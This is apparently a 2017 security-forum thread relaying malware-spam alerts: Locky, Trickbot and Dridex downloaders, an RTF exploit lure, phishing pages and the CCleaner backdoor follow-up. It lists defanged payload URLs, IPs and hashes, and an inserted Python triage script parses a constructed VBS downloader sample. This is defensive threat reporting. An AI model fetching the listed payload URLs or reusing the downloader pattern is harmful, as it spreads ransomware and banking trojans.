** https://www.hybrid-analysis.com/sample/a0485d80d244dba619691fb4f39fc36ba3323616733e48b63d61af1cd0894906?environmentId=100
Contacted Hosts
65.182.174.12

*** https://www.virustotal.com/en/file/ac6da4890150e2037a5913623557ab759b62d0ee9206ec0bacac318523afbc53/analysis/1505984851/
TnipmOahC.exe

accuflowfloors .com: 65.182.174.12: https://www.virustotal.com/en/ip-address/65.182.174.12/information/
> https://www.virustotal.com/en/url/6564afeaf197a64e7f6142340a9197afbe8fdcbb177c890ce6fcd459a38c8c18/analysis/

fulcar .info: https://check-host.net/check-dns?host=fulcar.info
[ http://blog.dynamoo.com/2017/09/malware-spam-invoice-re-2017-09-21.html
21 Sep 2017
Comment: ... This will be the Necurs botnet. IPs will be all over the place... blocking .7z files would probably not cause much of a problem, these are commonly used for Locky right at the moment. ]

afradem .com: 178.255.99.134: https://www.virustotal.com/en/ip-address/178.255.99.134/information/
___

'CCleaner' Command and Control - follow up ...
- http://blog.talosintelligence.com/2017/09/ccleaner-c2-concern.html
Sep 20, 2017 - "Talos recently published a technical analysis of a backdoor which was included with version 5.33 of the CCleaner application*. During our investigation we were provided an archive containing files that were stored on the C2 server. Initially, we had concerns about the legitimacy of the files. However, we were able to quickly verify that the files were very likely genuine based upon the web server configuration files and the fact that our research activity was reflected in the contents of the MySQL database included in the archived files. In analyzing the delivery code from the C2 server, what immediately stands out is a list of organizations, including Cisco, that were specifically targeted through delivery of a second-stage loader. Based on a review of the C2 tracking database, which only covers four days in September, we can confirm that at least 20 victim machines were served specialized -secondary- payloads...
* http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html
... These new findings raise our level of concern about these events, as elements of our research point towards a possible unknown, sophisticated actor. These findings also support and reinforce our previous recommendation that those impacted by this supply chain attack should not simply remove the affected version of CCleaner or update to the latest version, but should restore from -backups- or -reimage- systems to ensure that they completely remove not only the backdoored version of CCleaner but -also- any other malware that may be resident on the system...
Conclusion: Supply chain attacks seem to be increasing in velocity and complexity. It's imperative that as security companies we take these attacks seriously. Unfortunately, security events that are not completely understood are often downplayed in severity. This can work counter to a victim's best interests. Security companies need to be conservative with their advice before all of the details of the attack have been determined to help users ensure that they remain protected. This is especially true in situations where entire stages of an attack go undetected for a long period of time. When advanced adversaries are in play, this is especially true. They have been known to craft attacks that avoid detection by specific companies through successful reconnaissance techniques. In this particular example, a fairly sophisticated attacker designed a system which appears to specifically target technology companies by using a supply chain attack to compromise a vast number of victims, persistently, in hopes to land some payloads on computers at very specific target networks..."
(More detail at the talosintelligence URL above.)

- https://www.helpnetsecurity.com/2017/09/21/ccleaner-compromise-targets/
Sep 21, 2017
>> https://www.helpnetsecurity.com/tag/ccleaner/

- https://blog.avast.com/progress-on-ccleaner-investigation
Sep 21, 2017

> https://www.askwoody.com/2017/is-your-ccleaner-safe-new-evidence-suggests-maybe-not/
Sep 21, 2017
> https://www.ghacks.net/2017/09/21/ccleaner-malware-second-payload-discovered/
Sep 21, 2017

:fear::fear: :mad:

AplusWebMaster
2017-09-22, 13:07
FYI...

Fake 'Forskolin' SPAM - using spoofed email addresses
- https://myonlinesecurity.co.uk/another-forskolin-spam-email-campaign-using-spoofed-email-addresses/
22 Sep 2017 - "... malspam campaign again today pushing the crappy, scummy, useless 'Forskolin weight loss' junk... Some subjects in the original emails include (there are hundreds of variants): These pretend to be Facebook notifications about missed private messages or pending notifications:
You photos that will be deleted in 1 days
You have notification that will be removed in 5 hours
For You new message that will be removed in 6 days
Private message that will be deleted in 3 hours
You friend that will be deleted in 5 hours
You have notification that will be deleted in 7 days

The Hotmail emails look like:
- https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/hotmail_dmarc_rejects_email.png

The original emails look like these:
- https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/support_3.png

- https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/support_2.png

- https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/support_1.png

The links go to a multitude of -compromised- sites but all eventually end today on
http ://weight4forlossdiet-4tmz .world/en/caus/forskolin/?bhu=8mczFswKd5ZrUCttf15dChmqRGCWobCch
(with a different random reference number) where you see a page looking like this:
> https://myonlinesecurity.co.uk/wp-content/uploads/2016/04/weightloss-scam.png
This shows the importance of having correct authentication set up on your email server with DMARC* reporting, so you know when your email address is being spoofed and used in a mass malspam campaign:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/hotmail_dmarc_rejects2.png

* https://myonlinesecurity.co.uk/another-compromised-tech-support-company-server-sending-spam-why-you-should-use-dmarc/ "

weight4forlossdiet-4tmz .world: 192.254.79.249: https://www.virustotal.com/en/ip-address/192.254.79.249/information/
> https://www.virustotal.com/en/url/5b444bf588807977cb9f3dae5c2293df7644563529b750e59b62fa35fc96ec06/analysis/

:fear::fear: :mad:

AplusWebMaster
2017-09-24, 12:41
FYI...

Fake 'BL copy' SPAM - RTF exploit delivers malware
- https://myonlinesecurity.co.uk/fwd-bl-copy-malspam-uses-rtf-exploit-cve-2017-0199-to-deliver-malware/
24 Sep 2017 - "An email with the subject of 'Fwd: BL copy' coming from pedro.estaba@ cindu .com.ve with a malicious word doc attachment delivers malware using the RTF exploit CVE-2017-0199. The word doc is actually an RTF doc. It is highly likely that recipients will get a similar email with different senders and email body content, imitating various innocent companies. These download -multiple- different malwares.
> https://nvd.nist.gov/vuln/detail/CVE-2017-0199
Last Modified: 04/12/2017
CVSS v2 Base Score: 9.3 HIGH

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/BL-copy.png

The CVE-2017-0199 exploit was plugged in all supported versions of Microsoft Office back in April 2017, with additional fixes in subsequent Security updates including September 2017. If you have not applied the patches, then simply opening or even just -previewing- these word docs in your email client or windows explorer might be enough to infect you...

export.doc - Current Virus total detections 24/59[1]. Payload Security[2]. Both Payload Security and manual analysis show a download of an HTA file from
http ://birsekermasali .com/hta/docs.hta (VirusTotal 15/59[3]) (Payload Security[4]) which contains encoded / encrypted commands to download
http ://birsekermasali .com/js/boss/payment.exe which is giving a 404.
I decided to dig around a bit on the open directories on birsekermasali .com and see what I could find. Trying
http ://birsekermasali .com/js/boss/ gave me a password required prompt, but trying the
http ://birsekermasali .com/hta/ gave me -2- additional -HTA- files:

allfiles.hta (VirusTotal 6/58[5]) (Payload Security[6]) which downloads
http ://birsekermasali .com/js/boss/invoices.exe (VirusTotal 38/65[7]) (Payload Security[8])
kelly.hta (VirusTotal 14/59[9]) (Payload Security[10]) which downloads
http ://birsekermasali .com/js/kels/docs.exe (VirusTotal 46/65[11]) (Payload Security[12]) which in turn downloads
http ://birsekermasali .com/js/kels/dates.exe (VirusTotal 41/59[13]) (Payload Security[14])... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
1] https://www.virustotal.com/en/file/8e41225b75e0fc583b3618e867c5c4773eb79becc9b29068adc4893f74938258/analysis/1506187514/

2] https://www.hybrid-analysis.com/sample/8e41225b75e0fc583b3618e867c5c4773eb79becc9b29068adc4893f74938258?environmentId=100
Contacted Hosts
192.185.115.14

3] https://www.virustotal.com/en/file/73c4ee5d324f937607e2c5485a232ea14f088998dee5a8c31f7cf97d16840782/analysis/1506231952/
docs[1].hta

4] https://www.hybrid-analysis.com/sample/17ef7dea9cdf5036627394a3cbdd6a68ee0588aa02718a15c915c5d4760e461c?environmentId=100
Contacted Hosts

5] https://www.virustotal.com/en/file/17ef7dea9cdf5036627394a3cbdd6a68ee0588aa02718a15c915c5d4760e461c/analysis/1506234023/
allfiles.hta

6] https://www.hybrid-analysis.com/sample/17ef7dea9cdf5036627394a3cbdd6a68ee0588aa02718a15c915c5d4760e461c?environmentId=100
Contacted Hosts

7] https://www.virustotal.com/en/file/6f7685c862c9eb127ea70dd6dc0c4739fc3b98d81786c0835c08445eb48eef96/analysis/1506170974/

8] https://www.hybrid-analysis.com/sample/6f7685c862c9eb127ea70dd6dc0c4739fc3b98d81786c0835c08445eb48eef96?environmentId=100

9] https://www.virustotal.com/en/file/fc0d03d59151fb7b34cb0ce08490a48a9aa549e22f13f39ef1b003c4f98e6b38/analysis/1506234037/
kelly.hta

10] https://www.hybrid-analysis.com/sample/fc0d03d59151fb7b34cb0ce08490a48a9aa549e22f13f39ef1b003c4f98e6b38?environmentId=100
Contacted Hosts
192.185.115.14
198.54.115.96

11] https://www.virustotal.com/en/file/f1701c839f7a5bd8d8f54697fab611fa8a14c21fed3827ac74c124ac272a0ec3/analysis/1506035556/
output.112274294.txt

12] https://www.hybrid-analysis.com/sample/f1701c839f7a5bd8d8f54697fab611fa8a14c21fed3827ac74c124ac272a0ec3?environmentId=100

13] https://www.virustotal.com/en/file/2b6cd663fd179ec614546830af7866e6e2f7e20a0af349d2916dce027743aa4c/analysis/1506118256/

14] https://www.hybrid-analysis.com/sample/2b6cd663fd179ec614546830af7866e6e2f7e20a0af349d2916dce027743aa4c?environmentId=100

birsekermasali .com: 192.185.115.14: https://www.virustotal.com/en/ip-address/192.185.115.14/information/
> https://www.virustotal.com/en/url/c08a3b21b11d89f65be0fee13decc6e904ca44e39f9e6936a1a22a86ece003a3/analysis/
> https://www.virustotal.com/en/url/da45099dd81fe853e0a0a3a4bee84a2d43719560433979e3440594aabdee7cbc/analysis/

:fear::fear: :mad:

AplusWebMaster
2017-09-25, 12:59
FYI...

Fake 'Voice Message' SPAM - delivers Locky
- https://myonlinesecurity.co.uk/fake-broadviewnet-net-voice-message-malspam-delivers-locky-ransomware/
25 Sep 2017 - "... Locky ransomware... They are sticking with 'Voice Message' theme again today. It is an email with the subject of 'Message from 02031136950' (random phone number) pretending to come from server@ random number.um .broadviewnet .net. They all come from 'Message Server' and the email address is server@ random number.um .broadviewnet .net...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/Message-from-02031136950.png

Voice Message(02031136950.7z: Extracts to: Voice Message(02090039814).vbs - Current Virus total detections 10/58*. Payload Security**. These -vbs- files download from a large number of -compromised- sites. This example contacts
asheardontheradiogreens .com/YTkjdJH7w1
tertrodefordown .info/af/YTkjdJH7w1
artplast .uz/YTkjdJH7w1?
where a txt file is downloaded. The file is actually a renamed .exe file (VirusTotal 17/65***). With these, if there is a ? at the end of a URL, you get a renamed .txt file. If there is no ? you get an .exe that has no extension... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/e81576a55b527f4ae4abcf461ced2c3a7c92455af6138e26e257736bb99fda1f/analysis/1506322168/
Voice Message(02090039814).vbs

** https://www.hybrid-analysis.com/sample/e81576a55b527f4ae4abcf461ced2c3a7c92455af6138e26e257736bb99fda1f?environmentId=100
199.30.241.139

*** https://www.virustotal.com/en/file/b86a830769fcfd54201495353c5ab8931f7ca796ef54a2219a04b9e7cb7d2a7a/analysis/1506322258/
YTkjdJH7w1.txt

asheardontheradiogreens .com: 199.30.241.139: https://www.virustotal.com/en/ip-address/199.30.241.139/information/
> https://www.virustotal.com/en/url/cd130592c4710f1414156fdcb9fa9bb2452f11a94a0cc30baa6a31d847c205d7/analysis/

tertrodefordown .info: 49.51.36.73: https://www.virustotal.com/en/ip-address/49.51.36.73/information/
> https://www.virustotal.com/en/url/fa623e722c5e0502a7983d2776dd321cd2677d218a20e7a5d201206f8d4b0c52/analysis/

artplast .uz: 62.209.133.18: https://www.virustotal.com/en/ip-address/62.209.133.18/information/
> https://www.virustotal.com/en/url/2e951305a5269d89c21230322a37178c10db173b806fa0a98d32f360bfdaf65d/analysis/

:fear::fear: :mad:

AplusWebMaster
2017-09-26, 15:39
FYI...

Fake 'eFax and Virgin Media' SPAM - deliver Dridex
- https://myonlinesecurity.co.uk/dridex-banking-trojan-delivered-via-fake-emails-from-efax-and-virgin-media/
26 Sep 2017 - "... Dridex Banking Trojans being delivered via malspam emails... The 2 that I have looked at so far are:
'Your Virgin Media bill is ready' coming from Virgin Media <webteam@ virginmedia.smebusinesslink .com>
'Corporate eFax message' from “Unknown” – 4 page(s), Caller-ID: 44-161-261-1924 coming from eFax Corporate <message@ efax.inboundcop .com>
... the criminals sending these have registered look-a-like or plausible domains: they are actually using subdomains of these domains that make a recipient think that the emails are coming from a “proper” message sending service... The emails are just about identical to those on these 2 pages with the dates and amounts changed:
smebusinesslink .com on 24th September 2017 using eranet .com as registrar and hosted on OVH 188.165.217.40
> https://myonlinesecurity.co.uk/fake-efax-message-from-0300-200-3835-2-pages-malspam-delivers-smoke-sharik-dofoil-and-trickbot/
inboundcop .com on 24th September 2017 using eranet .com as registrar and hosted on OVH 188.165.232.177 ...
> https://myonlinesecurity.co.uk/fake-efax-message-from-0300-200-3835-2-pages-malspam-delivers-smoke-sharik-dofoil-and-trickbot/

They are sending these emails from a whole range of IP addresses (all tracking back to various subdomains of the 2 main -fraudulent- domains) under the control of these criminals that pass email authentication for the -fake- domains:
... The emails are just about identical to those on these 2 pages with the dates and amounts changed:
> 'Virgin Media Your Virgin Media bill is ready' ... and 'e Fax' ...
The link in the email goes to a -compromised- or fraudulently-set-up OneDrive for business/SharePoint site where a zip file containing a .js file is downloaded...

The Virgin site is:
https ://grllen-my.sharepoint .com/personal/misaacs_grllen_com_au/_layouts/15/guestaccess.aspx?docid=0f577514318c64d3a83fdc412856063e6&authkey=AZhzom6O9TOyFzZv4HUJ6zM
where a .js file is downloaded. That downloads 46.105.102.161 /PDF/Virginmedia_bill_25_09_2017_3 .pdf,
an innocent PDF file of a -genuine- Virgin Media bill, and displays that while at the same time downloading the Dridex banking Trojan in the background (I cannot determine the actual download location of the Dridex Trojan from the reports).
Virginmedia_bill_25_09_2017_3.zip: Extracts to: Virginmedia_bill_25_09_2017_3.js
Current Virus total detections 4/58[1]. Payload Security[2] | Dridex Payload - VirusTotal 13/61[3] | Payload Security[4] |

The eFax site is:
https ://ucg1-my.sharepoint .com/personal/janet_lau_ucg_co_nz/_layouts/15/guestaccess.aspx?docid=0eab92172e4fb424093bc21e476a6a698&authkey=AT_9AE00prV_R0aRf9HYOtg
where another .js file is downloaded. That also downloads an innocent PDF file from
188.165.193.38 /PDF/FAX_20170925_1401908954_6.pdf
saying it is all about the Rural Payments Agency and displays that while at the same time downloading the
-Dridex- banking Trojan in the background (I cannot determine the actual download location of the Dridex Trojan from the reports)...:
FAX_20170925_1401908954_6.zip: Extracts to: FAX_20170925_1401908954_6.js
Current Virus total detections 7/59[5]: Payload Security[6] | Dridex Payload - VirusTotal 13/61[7] | Payload Security[8] |
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
1] https://www.virustotal.com/en/file/0df50f3718c1718a4d75e8cf473446cf1a9268d9095459f60aafd28873b4f6fa/analysis/1506415697/
Virginmedia_bill_25_09_2017_3.js

2] https://www.hybrid-analysis.com/sample/0df50f3718c1718a4d75e8cf473446cf1a9268d9095459f60aafd28873b4f6fa?environmentId=100
Contacted Hosts

3] https://www.virustotal.com/en/file/94cf110c69bab9d6645fb1dbd8f97bcb3e3a66334097223a37bf2198bd045c3f/analysis/1506415824/

4] https://www.hybrid-analysis.com/sample/94cf110c69bab9d6645fb1dbd8f97bcb3e3a66334097223a37bf2198bd045c3f?environmentId=100
Contacted Hosts

5] https://www.virustotal.com/en/file/5cd789842cb215d493d6dd227c72c0a3f95ada69bb40c049ae9b7cb0d7a4a5b0/analysis/1506418921/
FAX_20170925_1401908954_6.js

6] https://www.hybrid-analysis.com/sample/5cd789842cb215d493d6dd227c72c0a3f95ada69bb40c049ae9b7cb0d7a4a5b0?environmentId=100
Contacted Hosts

7] https://www.virustotal.com/en/file/94cf110c69bab9d6645fb1dbd8f97bcb3e3a66334097223a37bf2198bd045c3f/analysis/1506415824/

8] https://www.hybrid-analysis.com/sample/94cf110c69bab9d6645fb1dbd8f97bcb3e3a66334097223a37bf2198bd045c3f?environmentId=100
Contacted Hosts

grllen-my.sharepoint .com: 13.107.6.151: https://www.virustotal.com/en/ip-address/13.107.6.151/information/

ucg1-my.sharepoint .com: 13.107.6.151

188.165.217.40: https://www.virustotal.com/en/ip-address/188.165.217.40/information/

188.165.232.177: https://www.virustotal.com/en/ip-address/188.165.232.177/information/

:fear::fear: :mad:

AplusWebMaster
2017-09-27, 17:44
FYI...

Fake 'UPS' SPAM - tries to deliver malware
- https://myonlinesecurity.co.uk/fake-ups-quantum-view-ups-ship-notification-tracking-number-tries-to-deliver-malware/
27 Sep 2017 - "... malware downloaders... an email with the subject of 'UPS Ship Notification, Tracking Number 1Z51322Y3483221007' (random numbers) pretending to come from UPS Quantum View <pkginfo26@ ups .com> (random pkginfo numbers)...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/UPS-Ship-Notification-Tracking-Number-1Z51322Y3483221007.png
... following the link gives you a webpage looking like one of these screenshots; pressing login does different things or -nothing- depending on the site:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/fake_UPS_tracking.png

This is a slightly more complicated infection chain than usual. There are -dozens- of different sites in the emails -hidden- behind the shipment details link. A lot of them don’t do anything except display a -fake- UPS website. Some however are connecting via an -iframe- to download
http ://rateventrithathen .info/track.php which gave me TRACK-1Z68725Y5236890147.js
Current Virus total detections 2/59*. Payload Security** | Joe Security***
Neither online sandbox retrieved any payload, whether the sites are blocked or the JS is VM aware is unknown... The basic rule is NEVER open any attachment or link in email, unless you are expecting it..."
* https://www.virustotal.com/en/file/a6c8824c80f4b2330921963ce277a9ad4c189f6f8850128a15f80d9a91d87dcc/analysis/1506504272/
TRACK-1Z68725Y5236890147.js

** https://www.hybrid-analysis.com/sample/a6c8824c80f4b2330921963ce277a9ad4c189f6f8850128a15f80d9a91d87dcc?environmentId=100
Contacted Hosts
49.51.36.73

*** https://jbxcloud.joesecurity.org/analysis/378185/1/html

rateventrithathen .info: 49.51.36.73: https://www.virustotal.com/en/ip-address/49.51.36.73/information/
> https://www.virustotal.com/en/url/39326c0e62e2e222ecbcfdd844eef803f0919d514c92c67669aa5850787764cf/analysis/
___

Email credential phish...
- https://myonlinesecurity.co.uk/email-credential-phishing-via-fake-emirates-bank-statement-and-fake-generic-proforma-invoice-scams/
27 Sep 2017 - "... seeing a series of “attacks” using Adobe as the lure. So far I have seen 2 different ones...

Screenshot:
1] https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/Fake-Emirates-Bank-Cash-Statement-email.png
This email has a genuine PDF attachment with a link to http ://bit .ly/2wTMuYg which will -redirect- you to
http ://cloudy-exch .pw/invoice/update.HTML. There is a warning on the bit.ly page that alerts to it being a phishing or malware site but will -still- allow you to visit the page by clicking-the-link:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/cash-statement_pdf.png
... However downloading the html file will open in Firefox only on the computer.
The page looks like this:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/cloudy_data_text_adobe.png
... where -if- you enter any details and press submit, you are redirected to https ://drive.google .com/file/d/0BxKSeHpNweSsWldNaGpUMDlHWW8/view
... where you see this -fake- statement:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/cash-statement_google_drive.png

The next -phishing-scam- works right out of the box with no effort:
2] https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/Request-For-Proforma-Invoice-Urgent.png
This PDF attachment looks like:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/Ugent-New-Order_pdf.png
Where -if- you follow the link you go to
https ://app-onlinedoc.000webhostapp .com/Inv-47654345584.php?code=2000500 where you see:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/000webhost_adobe_scam.png
Entering details tries to -redirect- you to
http ://alliancecr .com/skd/xendr.php, where I get a 404 page not found (a quick lookup shows the site registered by GoDaddy in 2001; the DNS is managed by Cloudflare and there is no site found, so it is highly likely that Cloudflare have null routed the DNS already)... A quick look at the source code of the 000webhost page shows that it appears to try to send the information via Googlemail... Update: within minutes of reporting the 000webhost site, it was taken down. That is fast abuse response. I wish all webhosts were so quick and efficient..."

cloudy-exch .pw: 185.158.249.100: https://www.virustotal.com/en/ip-address/185.158.249.100/information/
> https://www.virustotal.com/en/url/5ada7d41c615d3f3605b35e89a6acfe9ad674bdf10981d9228dd14d88de837b8/analysis/

app-onlinedoc.000webhostapp .com: 145.14.145.6: https://www.virustotal.com/en/ip-address/145.14.145.6/information/

alliancecr .com: Could not find an IP address for this domain name...
___

JavaScript and Stealer DLL Variant in New Attacks
- http://blog.talosintelligence.com/2017/09/fin7-stealer.html
Sep 27, 2017 - "... a newly discovered -RTF- document family that is being leveraged by the FIN7 group (also known as the Carbanak gang) which is a financially-motivated group targeting the financial, hospitality, and medical industries. This document is used in -phishing- campaigns to execute a series of scripting languages containing multiple obfuscation mechanisms and advanced techniques to bypass traditional security mechanisms. The document contains messages enticing the user to click on an embedded object that executes scripts which are used to infect the system with an information stealing malware variant. This malware is then used to steal passwords from popular browsers and mail clients which are sent to remote nodes that are accessible to the attackers... The dropper variant that we encountered makes use of an LNK file to execute wscript.exe with the beginning of the JavaScript chain from a word document object...
Command and Control IPs"
(More detail at the talosintelligence URL above.)

:fear::fear: :mad:

AplusWebMaster
2017-09-28, 13:18
FYI...

Fake 'Scan xxx' SPAM - Necurs sent Locky/Trickbot
- https://myonlinesecurity.co.uk/necurs-botnet-spam-now-distributing-locky-and-trickbot-via-same-vbs-file-using-geo-location-techniques/
28 Sep 2017 - "... malware downloaders coming from the necurs botnet... email with the subject of 'Emailing: Scan0253' (random numbers) pretending to come from random names at your-own-email-address or company domain. Today they have changed delivery method and will give either Locky Ransomware or Trickbot banking Trojan depending on your IP address and country of origin...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/Emailing-Scan0253-locky-and-trickbot-delivery-email.png

Scan0253.7z: Extracts to: Scan0277.vbs - Current Virus total detections 11/59*. Payload Security** |
In this particular VBS example there were 6 hard coded urls:
"geeks-online .de/9hciunery8g?",
"freevillemusic .com/9hciunery8g?" (VirusTotal 9/65[3]) (Payload Security[4]) Looks like Trickbot
"anarakdesert .com/LUYTbjnrf?",
"americanbulldogradio .com/LUYTbjnrf?"
"sherylbro .net/p66/LUYTbjnrf" (VirusTotal 20/65[5]) (Payload Security[6]) This one is Locky
"poemsan .info/p66/d8743fgh" - Also Locky but a different file hash (VirusTotal 39/64[7]) (Payload Security[8])
The lookup services used are: "https ://ipinfo .io/json",
"http ://www.geoplugin .net/json.gp",
"http ://freegeoip .net/json/"
Update: thanks to Racco42[9] we have a full list of currently known URLs posted on Pastebin[10]...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/882d308ab744d112b60f62faabc0dfdd6ff5dd2ff77a8fd0c664098f01ec7ea6/analysis/1506589221/
Scan0277.vbs

** https://www.hybrid-analysis.com/sample/882d308ab744d112b60f62faabc0dfdd6ff5dd2ff77a8fd0c664098f01ec7ea6?environmentId=100
Contacted Hosts
216.239.38.21
178.237.36.10
205.204.66.82

3] https://www.virustotal.com/en/file/01e771dc6cf9572eac3d87120d7a7d1ff95fdc1499b668c7fde2919e0f685256/analysis/1506589359/

4] https://www.hybrid-analysis.com/sample/01e771dc6cf9572eac3d87120d7a7d1ff95fdc1499b668c7fde2919e0f685256?environmentId=100

5] https://www.virustotal.com/en/file/4551578e5445ffb08965a1c946b9c4f8934b96f15ad591fea251c8eceda750a6/analysis/1506589526/

6] https://www.hybrid-analysis.com/sample/4551578e5445ffb08965a1c946b9c4f8934b96f15ad591fea251c8eceda750a6?environmentId=100

7] https://www.virustotal.com/en/file/3e55a7a405e4c4e4ad6d19296ac512d6c32441d5a65419cd116faa672b11963c/analysis/1506591639/

8] https://www.hybrid-analysis.com/sample/3e55a7a405e4c4e4ad6d19296ac512d6c32441d5a65419cd116faa672b11963c?environmentId=100

9] https://twitter.com/Racco42/status/913339950015373312

10] https://pastebin.com/ahfN337m

> http://blog.dynamoo.com/2017/09/malware-spam-emailing-scan0xxx-from.html
28 Sep 2017 - "This -fake- 'document scan' delivers different malware depending on the victim's location...
... All these recent attacks have used .7z archive files which would require 7zip or a compatible program to unarchive. Most decent mail filtering tools should be able to block -or- strip this extension, more clever ones would be able to determine that there is a .vbs script in there and block on that too."

:fear::fear: :mad:
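The two downloader traits described in the posts above (hard-coded payload URLs where a trailing "?" returns a renamed .txt and no "?" returns a bare executable, plus geo-IP lookups that decide whether Locky or Trickbot is dropped) can be pulled out of a script statically for triage. This is an added example, not code from myonlinesecurity.co.uk or from the campaign; the sample VBS below is constructed and its hostnames are placeholders.

```python
import re
from dataclasses import dataclass, field

# Geo-IP lookup services named in the post; a downloader that calls one of
# these before fetching its payload is choosing what to drop by victim location.
GEO_LOOKUP_HOSTS = {"ipinfo.io", "www.geoplugin.net", "freegeoip.net"}

# Double-quoted string literals in VBScript / JScript source.
_STRING_RE = re.compile(r'"([^"\r\n]+)"')
# A literal shaped like host/path, scheme optional (the downloaders omit it).
_URL_RE = re.compile(r'^(?:https?://)?([a-z0-9.-]+\.[a-z]{2,})(/\S*)$', re.I)


@dataclass
class Triage:
    geo_lookups: list = field(default_factory=list)
    # (url, served_as_txt): a trailing "?" means the server hands back the
    # payload renamed to .txt; no "?" means a bare .exe with no extension.
    download_urls: list = field(default_factory=list)

    @property
    def geo_targeted(self) -> bool:
        return bool(self.geo_lookups) and bool(self.download_urls)


def triage_script(source: str) -> Triage:
    """Pull hard-coded URLs out of a script and split them into geo lookups
    and payload locations, noting which ones use the '?' .txt wrapper."""
    result = Triage()
    for literal in _STRING_RE.findall(source):
        m = _URL_RE.match(literal.strip())
        if not m:
            continue
        host, path = m.group(1).lower(), m.group(2)
        if host in GEO_LOOKUP_HOSTS:
            result.geo_lookups.append(host)
        else:
            result.download_urls.append((literal.strip(), path.endswith("?")))
    return result


def summarize(triage: Triage) -> list:
    """Human-readable lines for an analyst note or a sandbox report."""
    lines = [f"geo-lookup services: {', '.join(triage.geo_lookups) or 'none'}"]
    for url, as_txt in triage.download_urls:
        wrapper = "renamed .txt" if as_txt else "bare executable"
        lines.append(f"payload URL: {url} ({wrapper})")
    if triage.geo_targeted:
        lines.append("verdict: geo-targeted downloader, payload depends on victim location")
    return lines


# Constructed sample in the shape of the Scan0277.vbs downloader described in
# the post; the hostnames are placeholders, not the real sites.
SAMPLE_VBS = r'''
Set shell = CreateObject("WScript.Shell")
urls = Array("geeks-online.example/9hciunery8g?", _
             "freevillemusic.example/9hciunery8g?", _
             "sherylbro.example/p66/LUYTbjnrf")
geo = Array("https://ipinfo.io/json", _
            "http://www.geoplugin.net/json.gp", _
            "http://freegeoip.net/json/")
'''

if __name__ == "__main__":
    for line in summarize(triage_script(SAMPLE_VBS)):
        print(line)
```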

AplusWebMaster
2017-09-29, 19:42
FYI...

Fake 'invoice' SPAM - deliver Locky/Trickbot
- https://myonlinesecurity.co.uk/another-change-with-locky-delivery-methods-today-payload-embedded-in-a-large-js-file/
29 Sep 2017 - "... Locky downloaders... an email with a blank/empty subject pretending to come from random names and email addresses. The body content pretends to be an 'invoice' notification. There are -no- attachments with these emails but a link-in-the-email-body goes to various -compromised- sites to download a .js file. As far as I can tell the actual Locky payload is -embedded- inside the .js file. For some strange reason the js file is named voicemsg_random numbers.js which would indicate that this was intended or has also been used in a voice message scam attempt to deliver Locky as well. The other strange thing in this campaign is the url in the body. All the ones I received are broken and start with 'ttp://' but looking at the mailscanner on my server they look -normal- with a complete html and start with the proper 'http://'...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/invoice-email-with-blank-subject.png

voicemsg_088436.js - 410.7 KB (420558 bytes) - Current Virus total detections 5/59*. Payload Security**
| drops 1102.exe 298.0 KB (305152 bytes) - VirusTotal 14/65[3] - Payload Security[4].
Nothing is actually detecting these as -Locky- Ransomware and in fact some AV on VirusTotal detect as
-Cerber- Ransomware. I am only calling these Locky based on the
moroplinghaptan .info/eroorrrs post request (giving a 404) shown in the Payload Security report. This has been a strong Indicator-of-Compromise (IOC) for Locky recently.
> Update: I am reliably informed that it depends on your IP address and location what malware you get. You will either get
-Locky- Ransomware or -Trickbot- banking Trojan embedded inside the .js file.
Some of the download sites in the emails include:
http ://resortphotographics .com/invoice.html
http ://somallc .com/invoice.html
http ://pinkyardflamingos .com/invoice.html
http ://agregate-cariera .ro/invoice.html
http ://sgtenterprises .com/invoice.html
http ://weloveflowers .co.uk/invoice.html
They all use an -iframe- to actually download from
http ://moroplinghaptan .info/offjsjs/ - This site has been used in a later Locky campaign today that was spoofing voice messages...
The basic rule is NEVER open any attachment or -link- in an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/beab97c46f237c07a12390f3002516a5b62f2dbc4a56a6bcc3f0dc59e0fbf5c5/analysis/1506691940/
voicemsg_088436.js

** https://www.hybrid-analysis.com/sample/beab97c46f237c07a12390f3002516a5b62f2dbc4a56a6bcc3f0dc59e0fbf5c5?environmentId=100
Contacted Hosts
49.51.133.167
216.58.213.174

3] https://www.virustotal.com/en/file/34d9864013844cc0f7e57d30444fd498a9f5394ab2eedef93440d3806053fe35/analysis/1506692289/
1102.exe

4] https://www.hybrid-analysis.com/sample/34d9864013844cc0f7e57d30444fd498a9f5394ab2eedef93440d3806053fe35?environmentId=100

moroplinghaptan .info: 49.51.133.167: https://www.virustotal.com/en/ip-address/49.51.133.167/information/
> https://www.virustotal.com/en/url/47cca10fea1cab5319052d318d669578043c23b4b13900814b08f0582fcba588/analysis/
___

Fake 'Office 365 invoice' - delivers Locky
- https://myonlinesecurity.co.uk/fake-office-365-invoice-delivers-locky-ransomware/
29 Sep 2017 - "The 3rd version I have seen today... Locky downloaders have gone back to a traditional zip (7z) attachment containing a vbs file. This is an email pretending to be an 'Office 365 Invoice' with the subject of 'Invoice' pretending to come from the -same-name- that is in the recipient field. Random names & email addresses...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/09/Invoice_O365.png

